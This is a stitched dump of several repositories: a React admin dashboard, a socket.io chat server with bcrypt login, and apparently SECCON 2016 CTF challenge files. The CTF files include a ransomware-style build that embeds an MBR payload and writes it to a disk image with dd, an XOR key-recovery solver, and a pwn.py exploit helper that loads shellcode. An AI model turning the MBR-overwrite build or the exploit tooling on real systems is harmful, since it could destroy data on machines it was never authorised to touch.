<FormItem {...formItemLayout4} label="门店详情">
{getFieldDecorator('detail')(
<BraftEditor
className="my-editor"
controls={controls}
placeholder="请输入正文内容"
/>
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '100px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button onClick={this.handleReset} style={{ width: '100px', marginRight: '20px' }}>清空</Button>
<Button style={{ width: '100px' }}><Link to="/user/list">返回</Link></Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import path from 'path';
import express from 'express';
import history from 'connect-history-api-fallback';
import httpProxy from 'http-proxy';
import compression from 'compression';
import helmet from 'helmet';
const app = new express();
const port = 8000;
app.use(history());
app.use(compression()); // 使用 gzip/deflate 压缩响应文件
app.use(helmet()); // 使用 Helmet 避免被常见漏洞侵袭
app.use('/', express.static(path.join(__dirname, '..', 'build')));
const targetUrl = 'http://172.16.17.32:9997';
const proxy = httpProxy.createProxyServer({
target: targetUrl,
prependPath: false
})
app.use('/api', (req, res) => {
proxy.web(req, res);
});
app.listen(port, (err) => {
if (err) {
console.log(err);
} else {
console.log(`===>open listen port 8000`);
}
});
<file_sep>import { GET_PRODUCT_TYPE_LIST } from '../action/productType';
const defaultState = {
productTypeList: {},
}
export default (state = defaultState, action) => {
switch (action.type) {
case GET_PRODUCT_TYPE_LIST:
return {
...state,
productTypeList: action.data
}
default:
return state
}
}
<file_sep>import { GET_PRODUCT_LIST, GET_PRODUCT_BYID } from '../action/product';
const defaultState = {
productList: {},
productDetail: {},
}
export default (state = defaultState, action) => {
switch (action.type) {
case GET_PRODUCT_LIST:
return {
...state,
productList: action.data
}
case GET_PRODUCT_BYID:
return {
...state,
productDetail: action.data
}
default:
return state
}
}
<file_sep>const API = {
authLogin: '/api/auth/oauth/token',
productList: '/api/goods/tProduct/page',
updateProduct: '/api/goods/tProduct/update', //put
addProduct: '/api/goods/tProduct', //post
getProductById: '/api/goods/tProduct',
batchUpProduct: '/api/goods/tProduct/batchUpProduct', // post
batchDownProduct: '/api/goods/tProduct/batchDownProduct', //post
addBatch: '/api/goods/tProductPrice/addBatch',
getProductCode: '/api/goods/tProduct/{id}/{sn}/getQRCode',
orderList: '/api/goods/order/page',
updateOrder: '/api/goods/order/update', //put
getOrderById: '/api/goods/order',
deleteOrderById: '/api/goods/order', //delete
userList: '/api/goods/tUserAccount/page',
upgradeUser: '/api/goods/tAgent/add', // post
updateUser: '/api/goods/tUserAccount/update',
getUserById: '/api/goods/tUserAccount',
getUserAddressById: '/api/goods/tUserAccountReceiveAddress',
getUserOrderById: '/api/goods/order/page',
getUserLoginList: '/api/admin/log/loginLogPage',
agentList: '/api/goods/tAgent/page',
getAgentById: '/api/goods/tAgent',
addAgent: '/api/goods/tAgent/add', // post
updateAgent: '/api/goods/tAgent/update',
agentProduct: '/api/goods/tAgentProduct/addBatch',
agentProductList: '/api/goods/tAgentProduct/page',
deleteAgentById: '/api/goods/tAgent',
getSkylightList: '/api/goods/tSkyLight/page',
getSkylightById: '/api/goods/tSkyLight',
addSkylight: '/api/goods/tSkyLight/add',
updateSkylight: '/api/goods/tSkyLight/update',
deleteSkylight: '/api/goods/tSkyLight',
getSystemLogList: '/api/admin/log/logPage',
getSystemDictList: '/api/admin/dict/dictPage',
getSystemDictByType: '/api/admin/dict/dictPage',
postSystemDict: '/api/admin/dict',
putSystemDict: '/api/admin/dict',
getSystemDictById: '/api/admin/dict/{id}',
getSystemDictByLabel: '/api/admin/dict/{label}',
getSystemDicts: '/api/admin/dict/dictList',
getUserInfo: '/api/admin/user/info',
getProductTypeList: '/api/goods/tProductType/page',
postProductType: '/api/goods/tProductType/add',
putProductType: '/api/goods/tProductType/update',
getProductTypeById: '/api/goods/tProductType/{id}',
getProductTypes: '/api/goods/tProductType/dictList',
delectAgentProduct: '/api/goods/tAgentProduct/deleteBatch/{agentId}',
resetAdminInfo: '/api/admin/user/editInfo',
}
export default API;
<file_sep>import API from '../utils/api';
import { get, post, put, deleted } from '../utils/request';
import { authUserExpire } from './auth';
export const GET_AGENT_LIST = 'GET_AGENT_LIST';
export const GET_AGENT_BYID = 'GET_AGENT_BYID';
export const GET_AGENT_PRODUCT_LIST = 'GET_AGENT_PRODUCT_LIST';
export function getAgentList(params) {
return async (dispatch) => {
const result = await get(API.agentList, params);
if (result && result.status === 200) {
dispatch({
type: GET_AGENT_LIST,
data: result.data
})
} else if (result && result.status === 401) {
dispatch(authUserExpire);
}
}
}
export function getAgentById(id) {
return async (dispatch) => {
const result = await get(`${API.getAgentById}/${id}`);
if (result && result.status === 200) {
dispatch({
type: GET_AGENT_BYID,
data: result.data.data
})
} else if (result && result.status === 401) {
dispatch(authUserExpire);
}
}
}
export async function addAgent(params) {
const result = await post(API.addAgent, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function putAgent(params) {
const result = await put(API.putAgent, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function deleteAgentById(id) {
const result = await deleted(`${API.deleteAgentById}/${id}`);
if (result && result.status === 200) {
return result.data;
}
}
export async function updateAgent(params) {
const result = await put(API.updateAgent, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function agentProduct(params) {
const result = await post(API.agentProduct, params);
if (result && result.status === 200) {
return result.data;
}
}
export function getAgentProductList(params) {
return async (dispatch) => {
const result = await get(API.agentProductList, params);
if (result && result.status === 200) {
dispatch({
type: GET_AGENT_PRODUCT_LIST,
data: result.data
})
} else if (result && result.status === 401) {
dispatch(authUserExpire);
}
}
}
export async function deleteAgentProduct(agentId, params) {
const result = await post(`${API.delectAgentProduct.replace(/{agentId}/, agentId)}`, params);
if (result && result.status === 200) {
return result.data;
}
}
<file_sep>
import { formatDateSecond, formatYuan } from '../../../utils/utils';
import { nullString, PAYMENT_METHOD, ORDER_STATUS, REGIST_CHANNEL } from '../../../utils/constant';
const columns = [
{
title: '订单编号',
dataIndex: 'id',
key: 'id',
align: 'center',
fixed: 'left',
render: (text) => text || nullString,
},
{
title: '提交时间',
dataIndex: 'createdTime',
key: 'createdTime',
align: 'center',
render: (text) => text ? formatDateSecond(text) : nullString,
},
{
title: '用户账号',
dataIndex: 'accountId',
key: 'accountId',
align: 'center',
render: (text) => text || nullString,
},
{
title: '订单金额(元)',
dataIndex: 'orderAmountPayable',
key: 'orderAmountPayable',
align: 'center',
render: (text) => formatYuan(text) || nullString,
},
{
title: '代理商',
dataIndex: 'agentId',
key: 'agentId',
align: 'center',
render: (text) => text || nullString,
},
{
title: '返点金额(元)',
dataIndex: 'rebateTotal',
key: 'rebateTotal',
align: 'center',
render: (text) => formatYuan(text) || nullString,
},
{
title: '支付方式',
dataIndex: 'paymentMethod',
key: 'paymentMethod',
align: 'center',
render: (text) => PAYMENT_METHOD[text] || nullString,
},
{
title: '订单来源',
dataIndex: 'registChannel',
key: 'registChannel',
align: 'center',
render: (text) => REGIST_CHANNEL[text] || nullString,
},
{
title: '订单状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => ORDER_STATUS[text] || nullString,
},
];
export default columns;
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Modal } from 'antd';
import { ORDER_OPERATE, formItemLayout, showTotal, ORDER_STATUS, REGIST_CHANNEL, formItemLayout3 } from '../../utils/constant';
import { getOrderList, updateOrder } from '../../action/order';
import OrderForm from './orderForm';
import listColumns from './columns/list';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ order }) => ({
orderList: order.orderList
}), {
getOrderList
})
@Form.create()
export default class OrderList extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
...listColumns,
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
fixed: 'right',
render: (text, record) => {
return (
<div>
<Link to={`/order/detail/${record.id}`}>查看</Link>
{ORDER_OPERATE[record.status] ? (
<span>
<Divider type="vertical" />
<a onClick={() => this.updateStatus(record)} href="javascript:;">{ORDER_OPERATE[record.status]}</a>
</span>
) : null}
</div>
)
}
},
];
}
state = {
selectedRowKeys: [],
loading: false,
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
visible: false,
orderId: undefined,
};
componentDidMount() {
this.getOrderList();
}
getOrderList = async (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getOrderList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleSubmit = (e) => {
e.preventDefault();
this.getOrderList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getOrderList({
limit: pagination.pageSize,
page: pagination.current,
});
}
handleOk = async (e) => {
const { orderDetail = {} } = this.props;
const { orderId } = this.state;
const account = orderDetail.account ? orderDetail.account: {};
this.orderForm.props.form.validateFields(async(err, values) => {
if (!err) {
const result = await updateOrder({
id: orderId,
accountId: account.id,
...values,
status: '2',
});
if (result && result.code === 0) {
this.getOrderList();
this.setState({
visible: false,
});
message.success('快递信息录入成功');
} else {
message.error('快递信息录入失败,请稍后重试');
}
}
});
}
updateStatus = async ({ id, accountId, status }) => {
let nextStatus = '0';
switch (status) {
case '0': nextStatus = '4';
break;
case '1': nextStatus = '2';
break;
case '2': nextStatus = '3'
break;
default: nextStatus = '0';
}
if (status === '1') {
this.setState({ orderId: id });
this.showModal();
return;
}
const result = await updateOrder({
id,
accountId,
status: nextStatus,
});
if (result && result.code === 0) {
message.success(`订单ID为${id}的产品${ORDER_OPERATE[status]}变更成功`);
const pager = { ...this.state.pagination };
this.getOrderList({
limit: pager.pageSize,
page: pager.current,
});
} else {
message.error('产品状态变更失败,请稍后重试');
}
}
showModal = () => {
this.setState({
visible: true,
});
}
handleCancel = () => {
this.setState({
visible: false,
});
}
render() {
const { form: { getFieldDecorator }, orderList } = this.props;
const { selectedRowKeys, loading } = this.state;
const rowSelection = {
selectedRowKeys,
onChange: this.onSelectChange,
}
return (
<div className="page-list order-list">
<Modal
title="备注订单"
visible={this.state.visible}
onOk={this.handleOk}
onCancel={this.handleCancel}
>
<OrderForm getCurrent={(node) => { this.orderForm = node }} />
</Modal>
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="订单编号">
{getFieldDecorator('expressTrackingNo')(
<Input placeholder="请输入订单编号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="订单状态">
{getFieldDecorator('status')(
<Select allowClear placeholder="请选择订单状态">
{Object.keys(ORDER_STATUS).map(item => (
<Option key={item} value={item}>{ORDER_STATUS[item]}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="订单来源">
{getFieldDecorator('registChannel')(
<Select allowClear placeholder="请选择订单来源">
{Object.keys(REGIST_CHANNEL).map(item => (
<Option key={item} value={item}>{REGIST_CHANNEL[item]}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="用户账户">
{getFieldDecorator('phoneNumber')(
<Input placeholder="请输入用户手机" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="代理商">
{getFieldDecorator('agentId')(
<Input placeholder="请输入代理商" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="提交起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
scroll={{ x: 1100 }}
rowSelection={rowSelection}
columns={this.columns}
dataSource={orderList.records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: orderList.total, ...this.state.pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { formatDateSecond } from '../../../utils/utils';
import { nullString, SKY_TYPE } from '../../../utils/constant';
const columns = [
{
title: '天窗ID',
dataIndex: 'skyId',
key: 'skyId',
align: 'center',
},
{
title: '天窗类型',
dataIndex: 'skyType',
key: 'skyType',
align: 'center',
render: (text) => SKY_TYPE[text] || nullString
},
{
title: '天窗标题',
dataIndex: 'skyTitle',
key: 'skyTitle',
align: 'center',
},
{
title: '天窗位置',
dataIndex: 'position',
key: 'position',
align: 'center',
},
{
title: '天窗图片',
dataIndex: 'skyContent',
key: 'skyContent',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '创建人',
dataIndex: 'creator',
key: 'creator',
align: 'center',
},
];
export default columns;
<file_sep>import { formatDateMinute } from '../../../utils/utils';
import { nullString, USER_ACCOUNT_STATUS } from '../../../utils/constant';
const columns = [
{
title: '用户账号',
dataIndex: 'phoneNumber',
key: 'phoneNumber',
align: 'center',
},
{
title: '姓名',
dataIndex: 'name',
key: 'name',
align: 'center',
},
{
title: '用户来源',
dataIndex: 'registChannel',
key: 'registChannel',
align: 'center',
},
{
title: '用户状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => USER_ACCOUNT_STATUS[text] || nullString
},
{
title: '注册时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
render: (text) => text ? formatDateMinute(text) : nullString
},
];
export default columns;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { getUserInfo } from '../../action/auth';
@connect(({ auth }) => ({
userInfo: auth.userInfo,
}), {
getUserInfo,
})
export default class Home extends React.PureComponent {
render() {
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
return (
<div>{sysUser.username},欢迎来到快易布业务管理系统!</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Form, Icon, Input, Button, message } from 'antd';
import { authUserLogin } from '../../action/auth';
import './index.css';
const FormItem = Form.Item;
@connect(null, { authUserLogin })
@Form.create()
export default class NormalLoginForm extends React.Component {
handleSubmit = (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const data = {
...values,
grant_type: 'password',
scope: 'server',
}
const result = await this.props.authUserLogin(data);
if (result) {
message.success('登录成功,欢迎来到快易布管理系统!');
this.props.history.push('/')
}
}
});
}
render() {
const { getFieldDecorator } = this.props.form;
return (
<div className="login-page">
<h4>快易布业务管理系统</h4>
<Form onSubmit={this.handleSubmit} className="login-form">
<FormItem>
{getFieldDecorator('username', {
rules: [{ required: true, message: '请输入用户名' }],
})(
<Input prefix={<Icon type="user" style={{ color: 'rgba(0,0,0,.25)' }} />} placeholder="请输入用户名" />
)}
</FormItem>
<FormItem>
{getFieldDecorator('password', {
rules: [{ required: true, message: '请输入密码' }],
})(
<Input prefix={<Icon type="lock" style={{ color: 'rgba(0,0,0,.25)' }} />} type="password" placeholder="请输入密码" />
)}
</FormItem>
<FormItem>
<Button type="primary" htmlType="submit" className="login-form-button">登录</Button>
</FormItem>
</Form>
</div>
);
}
}
| c11e0a98faef87044a582654634083181ccc1a59 | [
"JavaScript",
"SQL",
"Markdown"
] | 55 | JavaScript | yangyunxin/react-website | 430271972ba79497a2ab73758b408825aab2b1c4 | 4d1da8595cb861647ee42e18a32676b0b9d2141b |
refs/heads/master | <repo_name>OnsagerHe/chat_online<file_sep>/server/Dockerfile
FROM node:12-alpine
#docker build -f Dockerfile .
#docker run -it -d 3000:3000 6a5f66e92f76
WORKDIR /app
COPY . /app
RUN npm install
EXPOSE 8080
CMD [ "npm", "start" ]
<file_sep>/server/src/Routes/Auth/Auth.js
const db = require('../../config/set_db')
const bcrypt = require('bcrypt')
const express = require('express')
const saltRounds = 10;
let router = express.Router()
router
.route("/register")
.post(async (req, res) => {
const username = req.body.username;
const password = req.body.password;
bcrypt.hash(password, saltRounds, (err, hash)=> {
if (err) {
console.log(err);
}
db.query(
"INSERT INTO users (username, password) VALUES (?,?)",
[username, hash],
(err, result) => {
console.log(err);
}
);
});
})
router
.route("/login")
.post( async(req, res) => {
const username = req.body.username;
const password = <PASSWORD>;
await db.query(
"SELECT * FROM users WHERE username = ?;",
username,
(err, result) => {
if (err) {
res.send({ err: err });
}
if (result.length > 0) {
bcrypt.compare(password, result[0].password, (error, response) => {
if (response) {
req.session.user = result;
console.log(req.session.user);
res.send(result);
} else {
res.send({ message: "Wrong username/password combination!" });
}
});
} else {
res.send({ message: "User doesn't exist" });
}
}
);
})
.get( (req, res) => {
if (req.session.user) {
res.send({ loggedIn: true, user: req.session.user });
} else {
res.send({ loggedIn: false });
}
})
module.exports = router
<file_sep>/client/Dockerfile
FROM node:12-alpine
#docker run -it -p 3000:3000 6a5f66e92f76
WORKDIR /app
COPY . /app
RUN npm install
RUN npm install axios
EXPOSE 3000
CMD [ "npm", "start" ]
<file_sep>/client/src/chat/ChannelList.js
import React from 'react';
import Axios from "axios";
import { Channel } from './Channel';
let newChannel = ''
const channelAdd = async () => {
Axios.post("http://localhost:3001/channelAdd", {
username: newChannel
})
};
export class ChannelList extends React.Component {
handleClick = id => {
this.props.onSelectChannel(id);
}
constructor(props) {
super(props);
this.state = {value: ''};
this.handleChange = this.handleChange.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleChange(event) {
this.setState({value: event.target.value});
}
handleSubmit(event) {
newChannel = this.state.value;
event.preventDefault();
}
render() {
let list = <div className="no-content-message">There is no channels to show</div>;
if (this.props.channels && this.props.channels.map) {
list = this.props.channels.map(c => <Channel key={c.id} id={c.id} name={c.name} participants={c.participants} onClick={this.handleClick} />);
}
return (
<div className='channel-list'>
<form onSubmit={this.handleSubmit} onClick={channelAdd}>
<label>
<input type="text" value={this.state.value} onChange={this.handleChange} />
</label>
<input type="submit" value="Submit" />
</form>
{list}
</div>);
}
}
/*
constructor(props) {
super(props);
this.state = {value: ''};
this.handleChange = this.handleChange.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleChange(event) {
this.setState({value: event.target.value});
}
handleSubmit(event) {
newChannel = this.state.value;
event.preventDefault();
}
*/
/*
<form onSubmit={this.handleSubmit} onClick={channelAdd}>
<label>
<input type="text" value={this.state.value} onChange={this.handleChange} />
</label>
<input type="submit" value="Submit" />
</form>
*/
<file_sep>/server/src/server.js
var app = require('express')();
var http = require('http').createServer(app);
const PORT = 8080;
var io = require('socket.io')(http);
const test = require("express");
const cors = require("cors");
const bodyParser = require("body-parser");
const cookieParser = require("cookie-parser");
const session = require("express-session");
var STATIC_CHANNELS = [{
name: 'First Channel',
participants: 0,
id: 1,
sockets: []
}, {
name: 'Second Channel',
participants: 0,
id: 2,
sockets: []
}];
var id = 3;
var array = []
app.use((req, res, next) => {
res.setHeader('Access-Control-Allow-Origin', '*');
next();
})
http.listen(PORT, () => {
console.log(`listening on *:${PORT}`);
});
io.on('connection', (socket) => { // socket object may be used to send specific messages to the new connected client
console.log('new client connected');
socket.emit('connection', null);
socket.on('channel-join', id => {
console.log('channel join', id);
STATIC_CHANNELS.forEach(c => {
if (c.id === id) {
if (c.sockets.indexOf(socket.id) == (-1)) {
c.sockets.push(socket.id);
c.participants++;
io.emit('channel', c);
}
} else {
let index = c.sockets.indexOf(socket.id);
if (index != (-1)) {
c.sockets.splice(index, 1);
c.participants--;
io.emit('channel', c);
}
}
});
return id;
});
socket.on('send-message', message => {
io.emit('message', message);
console.log(message)
});
socket.on('disconnect', () => {
STATIC_CHANNELS.forEach(c => {
let index = c.sockets.indexOf(socket.id);
if (index != (-1)) {
c.sockets.splice(index, 1);
c.participants--;
io.emit('channel', c);
console.log("Disconnect Client")
}
});
});
});
app.get('/getChannels', (req, res) => {
res.json({
channels: STATIC_CHANNELS
})
});
const tmp = test();
tmp.use(test.json());
tmp.use(
cors({
origin: ["http://localhost:3000"],
methods: ["GET", "POST"],
credentials: true,
})
);
tmp.use(cookieParser());
tmp.use(bodyParser.urlencoded({ extended: true }));
tmp.use(
session({
key: "userId",
secret: "subscribe",
resave: false,
saveUninitialized: false,
cookie: {
expires: 60 * 60 * 24,
},
})
);
const routeAuth = require('./Routes/Auth/Auth')
tmp.post("/channelAdd", (req, res) => {
const username = req.body.username;
var tmp = (array.indexOf(username) > -1);
if (!tmp) {
array.push(username)
STATIC_CHANNELS.push({name: JSON.stringify(username), participants: 0, id: id++, sockets: []})
}
console.log(STATIC_CHANNELS)
});
tmp.use(routeAuth)
tmp.listen(3001, () => {
console.log("running server in " + 3001);
});
| 2d3b115638d3d67764e78b9f472fb0cfcbfe98d7 | [
"JavaScript",
"Dockerfile"
] | 5 | Dockerfile | OnsagerHe/chat_online | a42822fd8517388088ff0071f7d9564b431cf946 | 431eca16b6f1868f8cf38e6fccca8fa3cbb54cd7 |
refs/heads/master | <repo_name>emmeiwhite/firebase-auth<file_sep>/scripts/index.js
// 1) Let get our Guides an show then on the home page
const guideList = document.querySelector('#guide-list');
const getGuides = (guides) => {
if (guides.length >= 1) {
guideList.innerHTML = '';
let counter = 1;
guides.forEach(guide => {
const html = `
<div class="card">
<div class="card-header">
<h2 class="mb-0">
<button class="btn btn-block text-left" type="button" data-toggle="collapse" data-target="#collapseOne${counter}"
aria-expanded="true" aria-controls="collapseOne">
${guide.data().title}
</h2>
</div>
<div id="collapseOne${counter}" class="collapse" data-parent="#guide-list">
<div class="card-body">
${guide.data().content}
</div>
</div>
</div>
`;
guideList.innerHTML += html;
counter += 1;
});
} else {
guideList.innerHTML = `<h5 class="text-center font-weight-light">Login to see the Guides</h5>`;
}
};
// 2) Show Menu Links based on user status
const loggedInLinks = document.querySelectorAll('.logged-in');
const loggedOutLinks = document.querySelectorAll('.logged-out');
const showMenuUi = (user) => {
if (user) {
loggedInLinks.forEach(link => (link.style.display = 'block'));
loggedOutLinks.forEach(link => (link.style.display = 'none'));
} else {
loggedInLinks.forEach(link => (link.style.display = 'none'));
loggedOutLinks.forEach(link => (link.style.display = 'block'));
}
}<file_sep>/scripts/auth.js
/* --- 0) listen for auth status changes --- */
auth.onAuthStateChanged(user => {
if (user) {
db.collection('guides').get().then(snapshot => {
getGuides(snapshot.docs);
showMenuUi(user);
})
} else {
getGuides([]); // If user status is logged out we show the message
showMenuUi();
console.log('User logged out !!! ***');
}
});
/* --- 1) user signup ---*/
const signup = document.querySelector('.signup-form');
signup.addEventListener('submit', (e) => {
e.preventDefault();
const email = signup['signup-email'].value;
const password = signup['signup-password'].value;
// Now signing up with Firebase Auth. We use the method provided by the firebase-auth
// auth.createUserWithEmailAndPassword(email,password), and it returns a promise
auth.createUserWithEmailAndPassword(email, password)
.then(cred => {
$('#signup-modal').modal('hide');
signup.reset();
})
.catch(err => {
console.log('ERROR:', err);
});
});
/* --- 2) logout ---*/
const signout = document.querySelector('.signout');
signout.addEventListener('click', (e) => {
e.preventDefault();
auth.signOut();
});
/* --- 3) login a registered user ---*/
const login = document.querySelector('.login-form');
login.addEventListener('submit', (e) => {
e.preventDefault();
const email = login['login-email'].value;
const password = login['login-password'].value;
auth.signInWithEmailAndPassword(email, password)
.then(credential => {
console.log('USER LOGGED IN', credential);
$('#login-modal').modal('hide');
signup.reset();
})
.catch(err => {
console.log('USER NOT Registered', err);
});
});
/* --- 4) --- */ | 4246312c2689ba915a54a52f7ef9ecdd54aa9903 | [
"JavaScript"
] | 2 | JavaScript | emmeiwhite/firebase-auth | 003fac1b07e46dc873fb2de922999af31b228275 | 7610cf37b5c119b38a852ddaa51014e4563ae032 |
refs/heads/master | <repo_name>PinkDiamond1/SECCON2016_online_CTF<file_sep>/Forensic/300_randomware/build/server.sh
#!/bin/sh
sudo php -S 172.17.0.1:80
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/writedisk.sh
nbdloaded=`lsmod | grep nbd | wc -l`
if [ $nbdloaded -eq 0 ]; then
modprobe nbd
fi
qemu-nbd -c /dev/nbd0 disk.img
dd if=./mbr of=/dev/nbd0
qemu-nbd -d /dev/nbd0
<file_sep>/Forensic/300_randomware/solver/recover.py
plain = open('./blocklist.xml').read()
enc = open('./blocklist.xml.enc').read()
flag_enc = open('./flag.jpg.enc').read()
assert len(plain) == len(enc)
key = "".join([chr(ord(p)^ord(e)) for p, e in zip(plain, enc)])
key = key[:1024]
open('key', 'w').write(key)
flag = ""
for i in range(len(flag_enc)):
flag += chr(ord(flag_enc[i])^ord(key[i%1024]))
open('flag.jpg', 'w').write(flag)
<file_sep>/Binary/400_ropsynth/solver/test.sh
#!/bin/sh
../challenge/gadget_generator.py $1 > gadgets.$1
./solve.py gadgets.$1 ropchain.$1
cat gadgets.$1 ropchain.$1 | ./launcher.elf
<file_sep>/Binary/400_ropsynth/solver/pwn.py
import telnetlib
import subprocess
import socket
from socket import AF_INET, AF_UNIX, SOCK_STREAM
import sys
import os
import glob
######################################################################
# embed ipython shell
######################################################################
import IPython
if hasattr(IPython, "get_ipython") and IPython.get_ipython() == None:
ipshell = IPython.terminal.embed.InteractiveShellEmbed(display_banner=False)
else:
ipshell = lambda *x,**y: None
######################################################################
# extended socket
######################################################################
class mysocket(socket.socket):
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
socket.socket.__init__(self, family, type, proto, _sock)
def recv_until(self, eos):
retval = ""
while True:
ch = self.recv(1)
if len(ch) == 1:
retval += ch
else:
break
if retval.endswith(eos):
break
return retval
def recv_lines(self, num=0, prefix="[{num:>4}] "):
cnt = 0
retval = ""
while num <= 0 or cnt < num:
linebuf = self.recv_until("\n")
if len(linebuf) > 0:
retval += linebuf
print prefix.format(num=cnt), linebuf,
if linebuf.endswith("\n") == False:
print
break
cnt += 1
return retval
def interact(self):
t = telnetlib.Telnet()
t.sock = self
t.interact()
def mkproc(args):
sp = socket.socketpair(AF_UNIX, SOCK_STREAM)
fd = sp[0].makefile("rw")
subprocess.Popen(args, stdin=fd, stdout=fd, stderr=fd, close_fds=True)
return mysocket(_sock=sp[1])
def mktcp(addr):
sock = mysocket(AF_INET, SOCK_STREAM)
sock.connect(addr)
return sock
######################################################################
# shellcode
######################################################################
shellcode = {}
_scriptdir = os.path.dirname(os.path.abspath(__file__))
_shellcodefiles = os.path.normpath(os.path.join(_scriptdir, "shellcode/*.raw"))
for _fullpath in glob.glob(_shellcodefiles):
_fname = os.path.splitext(os.path.split(_fullpath)[1])[0]
with open(_fullpath, "rb") as _f:
shellcode[_fname] = _f.read()
######################################################################
# other utils
######################################################################
def hexdump(buf):
retval = ""
lines, last_bytes = divmod(len(buf), 16)
for cnt in range(lines):
linebuf = "%06x:" % (cnt*16)
for ch in buf[16*cnt:16*(cnt+1)]:
linebuf += " %02x" % ord(ch)
linebuf += " "
linebuf += "".join(
[ch if ord(ch)>=0x20 and ord(ch)<0x7f else "."
for ch in buf[16*cnt:16*(cnt+1)]])
linebuf += "\n"
retval += linebuf
if last_bytes > 0:
linebuf = "%06x:" % (lines*16)
for ch in buf[16*lines:]:
linebuf += " %02x" % ord(ch)
for cnt in range(16-last_bytes):
linebuf += " "
linebuf += " "
linebuf += "".join(
[ch if ord(ch)>=0x20 and ord(ch)<0x7f else "."
for ch in buf[16*lines:]])
retval += linebuf
return retval
######################################################################
# test
######################################################################
def test():
sock = mkproc(["/bin/ls", "-la"])
print hexdump(sock.recv_lines())
ipshell()
if __name__ =="__main__":
test()
<file_sep>/Forensic/300_randomware/build/ransom/Makefile
OC = objcopy
.PHONY: all
all: ransom
clean:
rm -f *.o mbrapp/*.o ransom mbrapp/mbr
ransom: main.c
cd mbrapp && make
cd ..
$(OC) --readonly-text -I binary -O elf32-i386 -B i386 mbrapp/mbr mbr.o
$(CC) -m32 -o ransom main.c mbr.o
chmod -x ransom
<file_sep>/Exploit/300_tinypad/build/solver/run.sh
#!/bin/sh
docker build -t tinypad:latest .
docker run -p 57463:57463 -t tinypad:latest &
<file_sep>/Binary/400_ropsynth/misc/Makefile
%.elf : %.o
gcc -nostdlib -znoexecstack -o $@ $<
strip $@
%.o : %.nasm
#nasm -felf64 -w-number-overflow -o $@ $<
nasm -felf64 -o $@ $<
all: a.elf readflag.elf material.elf gadgets.elf simple_gadgets.elf
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/main.c
#include "colors.h"
#include "util.c"
__asm__(".code16gcc");
__asm__("jmp mbrmain");
#define MAX 2016
void mbrmain(void) {
int i;
set_video_mode();
set_bg_color(TEXT_COLOR_BLACK);
print("Welcome to SECCON2016!!\r\n", TEXT_COLOR_YELLOW);
for(i = 0; i < MAX; i++) {
print("\rChecking ", TEXT_COLOR_WHITE);
printi(i+1, TEXT_COLOR_WHITE);
putchar('/', TEXT_COLOR_WHITE);
